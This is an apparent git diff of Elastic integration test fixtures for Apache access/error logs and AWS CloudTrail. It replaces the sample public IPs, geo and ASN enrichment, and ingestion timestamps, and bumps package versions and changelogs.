/appl/ajaxhelper.php?cmd=getxicoreajax&opts=%7B%22func%22%3A%22get_pagetop_alert_content_html%22%2C%22args%22%3A%22%22%7D&nsp=c2700eab9797eda8a9f65a3ab17a6adbceccd60a6cca7708650a5923950d HTTP/1.1" - diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log-expected.json b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log-expected.json index 7380738243f..0964c3ba0d3 100644 --- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log-expected.json +++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log-expected.json @@ -34,7 +34,7 @@ "ip": "172.30.0.119" }, "event": { - "ingested": "2021-06-09T07:19:56.415692800Z", + "ingested": "2021-12-09T13:30:31.533065900Z", "original": "[10/Aug/2018:09:45:56 +0200] 172.30.0.119 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \"GET /nagiosxi/ajaxhelper.php?cmd=getxicoreajax\u0026amp;opts=%7B%22func%22%3A%22get_admin_tasks_html%22%2C%22args%22%3A%22%22%7D\u0026amp;nsp=b5c7d5d4b6f7d0cf0c92f9cbdf737f6a5c838218425e6ae21 HTTP/1.1\" 1375", "category": "web", "kind": "event", @@ -76,20 +76,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } }, - "address": "11.19.0.217", - "ip": "11.19.0.217" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-06-09T07:19:56.415712800Z", - "original": "[16/Oct/2019:11:53:47 +0200] 11.19.0.217 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \"GET /appl/ajaxhelper.php?cmd=getxicoreajax\u0026opts=%7B%22func%22%3A%22get_pagetop_alert_content_html%22%2C%22args%22%3A%22%22%7D\u0026nsp=c2700eab9797eda8a9f65a3ab17a6adbceccd60a6cca7708650a5923950d HTTP/1.1\" -", + "ingested": "2021-12-09T13:30:31.533074100Z", + "original": "[16/Oct/2019:11:53:47 +0200] 89.160.20.156 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \"GET /appl/ajaxhelper.php?cmd=getxicoreajax\u0026opts=%7B%22func%22%3A%22get_pagetop_alert_content_html%22%2C%22args%22%3A%22%22%7D\u0026nsp=c2700eab9797eda8a9f65a3ab17a6adbceccd60a6cca7708650a5923950d HTTP/1.1\" -", "category": "web", "kind": "event", "created": "2020-04-28T11:07:58.223Z" diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ubuntu.log-expected.json b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ubuntu.log-expected.json index 2fbb9b5a50e..92c297c4b33 100644 --- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ubuntu.log-expected.json +++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ubuntu.log-expected.json @@ -33,7 +33,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.455415500Z", + "ingested": "2021-12-09T13:30:31.835525800Z", "original": "127.0.0.1 - - [26/Dec/2016:16:18:09 +0000] \"GET / HTTP/1.1\" 200 491 \"-\" \"Wget/1.13.4 (linux-gnu)\"", "category": "web", "kind": "event", @@ -88,7 +88,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.455434900Z", + "ingested": "2021-12-09T13:30:31.835534600Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:00 +0000] \"GET / HTTP/1.1\" 200 484 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "category": "web", "kind": "event", @@ -146,7 +146,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.455440100Z", + "ingested": "2021-12-09T13:30:31.835540100Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:00 +0000] \"GET /favicon.ico HTTP/1.1\" 404 504 \"http://192.168.33.72/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "category": "web", "kind": "event", @@ -203,7 +203,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.455446300Z", + "ingested": "2021-12-09T13:30:31.835543600Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:08 +0000] \"GET / HTTP/1.1\" 200 484 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0\"", "category": "web", "kind": "event", @@ -261,7 +261,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.455451Z", + "ingested": "2021-12-09T13:30:31.835548Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:08 +0000] \"GET /favicon.ico HTTP/1.1\" 404 504 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0\"", "category": "web", "kind": "event", @@ -319,7 +319,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.455455300Z", + "ingested": "2021-12-09T13:30:31.835553700Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:08 +0000] \"GET /favicon.ico HTTP/1.1\" 404 504 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0\"", "category": "web", "kind": "event", @@ -376,7 +376,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.455460900Z", + "ingested": "2021-12-09T13:30:31.835559600Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:10 +0000] \"GET /test HTTP/1.1\" 404 498 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0\"", "category": "web", "kind": "event", @@ -433,7 +433,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.455465300Z", + "ingested": "2021-12-09T13:30:31.835563600Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:13 +0000] \"GET /hello HTTP/1.1\" 404 499 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0\"", "category": "web", "kind": "event", @@ -490,7 +490,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.455469600Z", + "ingested": "2021-12-09T13:30:31.835568100Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:17 +0000] \"GET /crap HTTP/1.1\" 404 499 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0\"", "category": "web", "kind": "event", diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-vhost.log-expected.json b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-vhost.log-expected.json index f1ae5d9b3f4..8b6a8cbbef2 100644 --- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-vhost.log-expected.json +++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-vhost.log-expected.json @@ -36,7 +36,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.592388Z", + "ingested": "2021-12-09T13:30:33.387841500Z", "original": "vhost1.domaine.fr 192.168.33.2 - - [26/Dec/2016:16:22:14 +0000] \"GET /hello HTTP/1.1\" 404 499 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0\"", "category": "web", "kind": "event", diff --git a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log index de56f84779d..b8120aacfdc 100644 --- a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log +++ b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log @@ -1,4 +1,4 @@ [Mon Dec 26 16:22:08 2016] [error] [client 192.168.33.1] File does not exist: /var/www/favicon.ico [Mon Dec 26 16:15:55.103786 2016] [core:notice] [pid 11379] AH00094: Command line: '/usr/local/Cellar/httpd24/2.4.23_2/bin/httpd' -[Fri Sep 09 10:42:29.902022 2011] [core:error] [pid 35708:tid 4328636416] [client 72.15.99.187] File does not exist: /usr/local/apache2/htdocs/favicon.ico -[Thu Jun 27 06:58:09.169510 2019] [include:warn] [pid 15934] [client 123.123.123.123:12345] AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html +[Fri Sep 09 10:42:29.902022 2011] [core:error] [pid 35708:tid 4328636416] [client 89.160.20.156] File does not exist: /usr/local/apache2/htdocs/favicon.ico +[Thu Jun 27 06:58:09.169510 2019] [include:warn] [pid 15934] [client 89.160.20.156:12345] AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html diff --git a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log-expected.json b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log-expected.json index 5d37a16cfd5..21df2d32d2f 100644 --- a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log-expected.json +++ b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log-expected.json @@ -19,7 +19,7 @@ "ip": "192.168.33.1" }, "event": { - "ingested": "2021-06-09T07:19:56.729116800Z", + "ingested": "2021-12-09T13:30:33.868254100Z", "original": "[Mon Dec 26 16:22:08 2016] [error] [client 192.168.33.1] File does not exist: /var/www/favicon.ico", "category": "web", "type": "error", @@ -48,7 +48,7 @@ "level": "notice" }, "event": { - "ingested": "2021-06-09T07:19:56.729153500Z", + "ingested": "2021-12-09T13:30:33.868263600Z", "original": "[Mon Dec 26 16:15:55.103786 2016] [core:notice] [pid 11379] AH00094: Command line: '/usr/local/Cellar/httpd24/2.4.23_2/bin/httpd'", "category": "web", "type": "info", @@ -72,25 +72,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-GA", - "city_name": "Newnan", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Georgia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -84.8154, - "lat": 33.3708 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 11693, + "number": 29518, "organization": { - "name": "WideOpenWest Finance LLC" + "name": "Bredband2 AB" } }, - "address": "72.15.99.187", - "ip": "72.15.99.187" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "File does not exist: /usr/local/apache2/htdocs/favicon.ico", "tags": [ @@ -109,8 +109,8 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-06-09T07:19:56.729182700Z", - "original": "[Fri Sep 09 10:42:29.902022 2011] [core:error] [pid 35708:tid 4328636416] [client 72.15.99.187] File does not exist: /usr/local/apache2/htdocs/favicon.ico", + "ingested": "2021-12-09T13:30:33.868270Z", + "original": "[Fri Sep 09 10:42:29.902022 2011] [core:error] [pid 35708:tid 4328636416] [client 89.160.20.156] File does not exist: /usr/local/apache2/htdocs/favicon.ico", "category": "web", "type": "error", "timezone": "GMT+2", @@ -135,30 +135,30 @@ }, "source": { "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-BJ", - "city_name": "Beijing", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Beijing", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 116.3889, - "lat": 39.9288 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 4808, + "number": 29518, "organization": { - "name": "China Unicom Beijing Province Network" + "name": "Bredband2 AB" } }, - "address": "123.123.123.123", + "address": "89.160.20.156", "port": 12345, - "ip": "123.123.123.123" + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-06-09T07:19:56.729191100Z", - "original": "[Thu Jun 27 06:58:09.169510 2019] [include:warn] [pid 15934] [client 123.123.123.123:12345] AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html", + "ingested": "2021-12-09T13:30:33.868275800Z", + "original": "[Thu Jun 27 06:58:09.169510 2019] [include:warn] [pid 15934] [client 89.160.20.156:12345] AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html", "category": "web", "type": "error", "timezone": "GMT+2", diff --git a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-darwin.log-expected.json b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-darwin.log-expected.json index f0d917a08e8..15400a6c97a 100644 --- a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-darwin.log-expected.json +++ b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-darwin.log-expected.json @@ -17,7 +17,7 @@ "level": "notice" }, "event": { - "ingested": "2021-06-09T07:19:56.788925900Z", + "ingested": "2021-12-09T13:30:34.149405700Z", "original": "[Mon Dec 26 16:15:55.103522 2016] [mpm_prefork:notice] [pid 11379] AH00163: Apache/2.4.23 (Unix) configured -- resuming normal operations", "category": "web", "type": "info", @@ -46,7 +46,7 @@ "level": "notice" }, "event": { - "ingested": "2021-06-09T07:19:56.788949700Z", + "ingested": "2021-12-09T13:30:34.149429600Z", "original": "[Mon Dec 26 16:15:55.103786 2016] [core:notice] [pid 11379] AH00094: Command line: '/usr/local/Cellar/httpd24/2.4.23_2/bin/httpd'", "category": "web", "type": "info", diff --git a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-trace.log-expected.json b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-trace.log-expected.json index 1d79fc8fdd3..7b5f6e1b4b1 100644 --- a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-trace.log-expected.json +++ b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-trace.log-expected.json @@ -20,7 +20,7 @@ "level": "trace3" }, "event": { - "ingested": "2021-10-29T11:35:09.169407941Z", + "ingested": "2021-12-09T13:30:34.228018700Z", "original": "[Wed Oct 20 19:20:59.121211 2021] [rewrite:trace3] [pid 121591:tid 140413273032448] mod_rewrite.c(470): [client 10.121.192.8:38350] 10.121.192.8 - - [dev.elastic.co/sid#55a374e851c8][rid#7fb438083ac0/initial] applying pattern '^/import/?(.*)$' to uri '/'", "category": "web", "type": "info", diff --git a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-ubuntu.log-expected.json b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-ubuntu.log-expected.json index 3245ceac45a..92c843f5903 100644 --- a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-ubuntu.log-expected.json +++ b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-ubuntu.log-expected.json @@ -12,7 +12,7 @@ "level": "notice" }, "event": { - "ingested": "2021-06-09T07:19:56.808481Z", + "ingested": "2021-12-09T13:30:34.283841100Z", "original": "[Mon Dec 26 16:17:53 2016] [notice] Apache/2.2.22 (Ubuntu) configured -- resuming normal operations", "category": "web", "type": "info", @@ -52,7 +52,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.808501500Z", + "ingested": "2021-12-09T13:30:34.283849400Z", "original": "[Mon Dec 26 16:22:00 2016] [error] [client 192.168.33.1] File does not exist: /var/www/favicon.ico, referer: http://192.168.33.72/", "category": "web", "type": "error", @@ -79,7 +79,7 @@ "ip": "192.168.33.1" }, "event": { - "ingested": "2021-06-09T07:19:56.808506500Z", + "ingested": "2021-12-09T13:30:34.283853Z", "original": "[Mon Dec 26 16:22:08 2016] [error] [client 192.168.33.1] File does not exist: /var/www/favicon.ico", "category": "web", "type": "error", @@ -110,7 +110,7 @@ "ip": "192.168.33.1" }, "event": { - "ingested": "2021-06-09T07:19:56.808510600Z", + "ingested": "2021-12-09T13:30:34.283857200Z", "original": "[Mon Dec 26 16:22:08 2016] [error] [client 192.168.33.1] File does not exist: /var/www/favicon.ico", "category": "web", "type": "error", @@ -141,7 +141,7 @@ "ip": "192.168.33.1" }, "event": { - "ingested": "2021-06-09T07:19:56.808514600Z", + "ingested": "2021-12-09T13:30:34.283862600Z", "original": "[Mon Dec 26 16:22:10 2016] [error] [client 192.168.33.1] File does not exist: /var/www/test", "category": "web", "type": "error", @@ -172,7 +172,7 @@ "ip": "192.168.33.1" }, "event": { - "ingested": "2021-06-09T07:19:56.808518300Z", + "ingested": "2021-12-09T13:30:34.283867900Z", "original": "[Mon Dec 26 16:22:13 2016] [error] [client 192.168.33.1] File does not exist: /var/www/hello", "category": "web", "type": "error", @@ -203,7 +203,7 @@ "ip": "192.168.33.1" }, "event": { - "ingested": "2021-06-09T07:19:56.808522100Z", + "ingested": "2021-12-09T13:30:34.283873300Z", "original": "[Mon Dec 26 16:22:17 2016] [error] [client 192.168.33.1] File does not exist: /var/www/crap", "category": "web", "type": "error", diff --git a/packages/apache/manifest.yml b/packages/apache/manifest.yml index aca322e0af2..b63f137bed4 100644 --- a/packages/apache/manifest.yml +++ b/packages/apache/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: apache title: Apache HTTP Server -version: 1.3.2 +version: 1.3.3 license: basic description: Collect logs and metrics from Apache servers with Elastic Agent. type: integration diff --git a/packages/aws/changelog.yml b/packages/aws/changelog.yml index f41d139c141..82002098a22 100644 --- a/packages/aws/changelog.yml +++ b/packages/aws/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.6.2" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.6.1" changes: - description: Fix the value of event.created in CloudTrail data stream. diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log index c2a4a5e884b..90e496fc0ff 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log @@ -1 +1 @@ -{"eventVersion":"1.05","userIdentity":{"type":"AssumedRole","principalId":"AROAIN5ATK5U7KEXAMPLE:JohnRole1","arn":"arn:aws:sts::111111111111:assumed-role/JohnDoe/JohnRole1","accountId":"111111111111","accessKeyId":"AKIAI44QH8DHBEXAMPLE","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2019-10-02T21:50:54Z"},"sessionIssuer":{"type":"Role","principalId":"AROAIN5ATK5U7KEXAMPLE","arn":"arn:aws:iam::111111111111:role/JohnRole1","accountId":"111111111111","userName":"JohnDoe"}}},"eventTime":"2019-10-02T22:12:29Z","eventSource":"sts.amazonaws.com","eventName":"AssumeRole","awsRegion":"us-east-2","sourceIPAddress":"123.145.67.89","userAgent":"aws-cli/1.16.248 Python/3.4.7 Linux/4.9.184-0.1.ac.235.83.329.metal1.x86_64 botocore/1.12.239","requestParameters":{"incomingTransitiveTags":{"Department":"Engineering"},"tags":[{"value":"johndoe@example.com","key":"Email"},{"value":"12345","key":"CostCenter"}],"roleArn":"arn:aws:iam::111111111111:role/JohnRole2","roleSessionName":"Role2WithTags","transitiveTagKeys":["Email","CostCenter"],"durationSeconds":3600},"responseElements":{"credentials":{"accessKeyId":"ASIAWHOJDLGPOEXAMPLE","expiration":"Oct 2, 2019 11:12:29 PM","sessionToken":"AgoJb3JpZ2luX2VjEB4aCXVzLXdlc3QtMSJHMEXAMPLETOKEN+//rJb8Lo30mFc5MlhFCEbubZvEj0wHB/mDMwIgSEe9gk/Zjr09tZV7F1HDTMhmEXAMPLETOKEN/iEJ/rkqngII9///////////ARABGgw0MjgzMDc4NjM5NjYiDLZjZFKwP4qxQG5sFCryASO4UPz5qE97wPPH1eLMvs7CgSDBSWfonmRTCfokm2FN1+hWUdQQH6adjbbrVLFL8c3jSsBhQ383AvxpwK5YRuDE1AI/+C+WKFZb701eiv9J5La2EXAMPLETOKEN/c7S5Iro1WUJ0q3Cxuo/8HUoSxVhQHM7zF7mWWLhXLEQ52ivL+F6q5dpXu4aTFedpMfnJa8JtkWwG9x1Axj0Ypy2ok8v5unpQGWych1vwdvj6ez1Dm8Xg1+qIzXILiEXAMPLETOKEN/vQGqu8H+nxp3kabcrtOvTFTvxX6vsc8OGwUfHhzAfYGEXAMPLETOKEN/L6v1yMM3B1OwFOrQBno1HEjf1oNI8RnQiMNFdUOtwYj7HUZIOCZmjfN8PPHq77N7GJl9lzvIZKQA0Owcjg+mc78zHCj8y0siY8C96paEXAMPLETOKEN/E3cpksxWdgs91HRzJWScjN2+r2LTGjYhyPqcmFzzo2mCE7mBNEXAMPLETOKEN/oJy+2o83YNW5tOiDmczgDzJZ4UKR84yGYOMfSnF4XcEJrDgAJ3OJFwmTcTQICAlSwLEXAMPLETOKEN"},"assumedRoleUser":{"assumedRoleId":"AROAIFR7WHDTSOYQYHFUE:Role2WithTags","arn":"arn:aws:sts::111111111111:assumed-role/test-role/Role2WithTags"}},"requestID":"b96b0e4e-e561-11e9-8b3f-7b396EXAMPLE","eventID":"1917948f-3042-46ec-98e2-62865EXAMPLE","resources":[{"ARN":"arn:aws:iam::111122223333:role/JohnRole2","accountId":"111111111111","type":"AWS::IAM::Role"}],"eventType":"AwsApiCall","recipientAccountId":"111111111111"} +{"eventVersion":"1.05","userIdentity":{"type":"AssumedRole","principalId":"AROAIN5ATK5U7KEXAMPLE:JohnRole1","arn":"arn:aws:sts::111111111111:assumed-role/JohnDoe/JohnRole1","accountId":"111111111111","accessKeyId":"AKIAI44QH8DHBEXAMPLE","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2019-10-02T21:50:54Z"},"sessionIssuer":{"type":"Role","principalId":"AROAIN5ATK5U7KEXAMPLE","arn":"arn:aws:iam::111111111111:role/JohnRole1","accountId":"111111111111","userName":"JohnDoe"}}},"eventTime":"2019-10-02T22:12:29Z","eventSource":"sts.amazonaws.com","eventName":"AssumeRole","awsRegion":"us-east-2","sourceIPAddress":"81.2.69.144","userAgent":"aws-cli/1.16.248 Python/3.4.7 Linux/4.9.184-0.1.ac.235.83.329.metal1.x86_64 botocore/1.12.239","requestParameters":{"incomingTransitiveTags":{"Department":"Engineering"},"tags":[{"value":"johndoe@example.com","key":"Email"},{"value":"12345","key":"CostCenter"}],"roleArn":"arn:aws:iam::111111111111:role/JohnRole2","roleSessionName":"Role2WithTags","transitiveTagKeys":["Email","CostCenter"],"durationSeconds":3600},"responseElements":{"credentials":{"accessKeyId":"ASIAWHOJDLGPOEXAMPLE","expiration":"Oct 2, 2019 11:12:29 PM","sessionToken":"AgoJb3JpZ2luX2VjEB4aCXVzLXdlc3QtMSJHMEXAMPLETOKEN+//rJb8Lo30mFc5MlhFCEbubZvEj0wHB/mDMwIgSEe9gk/Zjr09tZV7F1HDTMhmEXAMPLETOKEN/iEJ/rkqngII9///////////ARABGgw0MjgzMDc4NjM5NjYiDLZjZFKwP4qxQG5sFCryASO4UPz5qE97wPPH1eLMvs7CgSDBSWfonmRTCfokm2FN1+hWUdQQH6adjbbrVLFL8c3jSsBhQ383AvxpwK5YRuDE1AI/+C+WKFZb701eiv9J5La2EXAMPLETOKEN/c7S5Iro1WUJ0q3Cxuo/8HUoSxVhQHM7zF7mWWLhXLEQ52ivL+F6q5dpXu4aTFedpMfnJa8JtkWwG9x1Axj0Ypy2ok8v5unpQGWych1vwdvj6ez1Dm8Xg1+qIzXILiEXAMPLETOKEN/vQGqu8H+nxp3kabcrtOvTFTvxX6vsc8OGwUfHhzAfYGEXAMPLETOKEN/L6v1yMM3B1OwFOrQBno1HEjf1oNI8RnQiMNFdUOtwYj7HUZIOCZmjfN8PPHq77N7GJl9lzvIZKQA0Owcjg+mc78zHCj8y0siY8C96paEXAMPLETOKEN/E3cpksxWdgs91HRzJWScjN2+r2LTGjYhyPqcmFzzo2mCE7mBNEXAMPLETOKEN/oJy+2o83YNW5tOiDmczgDzJZ4UKR84yGYOMfSnF4XcEJrDgAJ3OJFwmTcTQICAlSwLEXAMPLETOKEN"},"assumedRoleUser":{"assumedRoleId":"AROAIFR7WHDTSOYQYHFUE:Role2WithTags","arn":"arn:aws:sts::111111111111:assumed-role/test-role/Role2WithTags"}},"requestID":"b96b0e4e-e561-11e9-8b3f-7b396EXAMPLE","eventID":"1917948f-3042-46ec-98e2-62865EXAMPLE","resources":[{"ARN":"arn:aws:iam::111122223333:role/JohnRole2","accountId":"111111111111","type":"AWS::IAM::Role"}],"eventType":"AwsApiCall","recipientAccountId":"111111111111"} diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log-expected.json index a5a1f8a53de..6231a4dd28d 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log-expected.json @@ -13,27 +13,28 @@ }, "source": { "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-CQ", - "country_name": "China", - "region_name": "Chongqing", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 106.5531, - "lat": 29.5569 - }, - "country_iso_code": "CN" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 4837, + "number": 20712, "organization": { - "name": "CHINA UNICOM China169 Backbone" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "123.145.67.89", - "ip": "123.145.67.89" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "event": { - "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"AssumedRole\",\"principalId\":\"AROAIN5ATK5U7KEXAMPLE:JohnRole1\",\"arn\":\"arn:aws:sts::111111111111:assumed-role/JohnDoe/JohnRole1\",\"accountId\":\"111111111111\",\"accessKeyId\":\"AKIAI44QH8DHBEXAMPLE\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2019-10-02T21:50:54Z\"},\"sessionIssuer\":{\"type\":\"Role\",\"principalId\":\"AROAIN5ATK5U7KEXAMPLE\",\"arn\":\"arn:aws:iam::111111111111:role/JohnRole1\",\"accountId\":\"111111111111\",\"userName\":\"JohnDoe\"}}},\"eventTime\":\"2019-10-02T22:12:29Z\",\"eventSource\":\"sts.amazonaws.com\",\"eventName\":\"AssumeRole\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"123.145.67.89\",\"userAgent\":\"aws-cli/1.16.248 Python/3.4.7 Linux/4.9.184-0.1.ac.235.83.329.metal1.x86_64 botocore/1.12.239\",\"requestParameters\":{\"incomingTransitiveTags\":{\"Department\":\"Engineering\"},\"tags\":[{\"value\":\"johndoe@example.com\",\"key\":\"Email\"},{\"value\":\"12345\",\"key\":\"CostCenter\"}],\"roleArn\":\"arn:aws:iam::111111111111:role/JohnRole2\",\"roleSessionName\":\"Role2WithTags\",\"transitiveTagKeys\":[\"Email\",\"CostCenter\"],\"durationSeconds\":3600},\"responseElements\":{\"credentials\":{\"accessKeyId\":\"ASIAWHOJDLGPOEXAMPLE\",\"expiration\":\"Oct 2, 2019 11:12:29 PM\",\"sessionToken\":\"AgoJb3JpZ2luX2VjEB4aCXVzLXdlc3QtMSJHMEXAMPLETOKEN+//rJb8Lo30mFc5MlhFCEbubZvEj0wHB/mDMwIgSEe9gk/Zjr09tZV7F1HDTMhmEXAMPLETOKEN/iEJ/rkqngII9///////////ARABGgw0MjgzMDc4NjM5NjYiDLZjZFKwP4qxQG5sFCryASO4UPz5qE97wPPH1eLMvs7CgSDBSWfonmRTCfokm2FN1+hWUdQQH6adjbbrVLFL8c3jSsBhQ383AvxpwK5YRuDE1AI/+C+WKFZb701eiv9J5La2EXAMPLETOKEN/c7S5Iro1WUJ0q3Cxuo/8HUoSxVhQHM7zF7mWWLhXLEQ52ivL+F6q5dpXu4aTFedpMfnJa8JtkWwG9x1Axj0Ypy2ok8v5unpQGWych1vwdvj6ez1Dm8Xg1+qIzXILiEXAMPLETOKEN/vQGqu8H+nxp3kabcrtOvTFTvxX6vsc8OGwUfHhzAfYGEXAMPLETOKEN/L6v1yMM3B1OwFOrQBno1HEjf1oNI8RnQiMNFdUOtwYj7HUZIOCZmjfN8PPHq77N7GJl9lzvIZKQA0Owcjg+mc78zHCj8y0siY8C96paEXAMPLETOKEN/E3cpksxWdgs91HRzJWScjN2+r2LTGjYhyPqcmFzzo2mCE7mBNEXAMPLETOKEN/oJy+2o83YNW5tOiDmczgDzJZ4UKR84yGYOMfSnF4XcEJrDgAJ3OJFwmTcTQICAlSwLEXAMPLETOKEN\"},\"assumedRoleUser\":{\"assumedRoleId\":\"AROAIFR7WHDTSOYQYHFUE:Role2WithTags\",\"arn\":\"arn:aws:sts::111111111111:assumed-role/test-role/Role2WithTags\"}},\"requestID\":\"b96b0e4e-e561-11e9-8b3f-7b396EXAMPLE\",\"eventID\":\"1917948f-3042-46ec-98e2-62865EXAMPLE\",\"resources\":[{\"ARN\":\"arn:aws:iam::111122223333:role/JohnRole2\",\"accountId\":\"111111111111\",\"type\":\"AWS::IAM::Role\"}],\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"111111111111\"}", + "original": 